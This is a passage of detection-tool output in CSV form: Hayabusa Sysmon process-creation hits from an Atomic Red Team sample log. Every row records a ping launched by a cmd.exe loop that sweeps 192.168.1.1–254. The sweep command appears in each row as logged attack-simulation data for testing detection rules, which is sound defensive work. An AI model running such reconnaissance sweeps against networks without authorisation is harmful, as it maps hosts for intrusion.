-n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.90 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.91 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.92 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.93 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.94 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.95 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.96 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.97 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.98 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.026 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.99 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.100 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.101 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.102 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.103 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.104 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.105 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.106 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.107 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.108 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.109 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.110 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.111 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.526 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.112 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.113 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.114 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.115 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.116 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.117 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.118 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.119 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.120 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.121 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.122 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.123 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.124 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.905 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.125 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.126 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.127 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.128 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.129 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.130 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.131 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.132 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.133 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.134 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.135 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.136 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.137 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.478 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.138 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.139 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.140 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.141 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.142 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.143 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.144 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.879 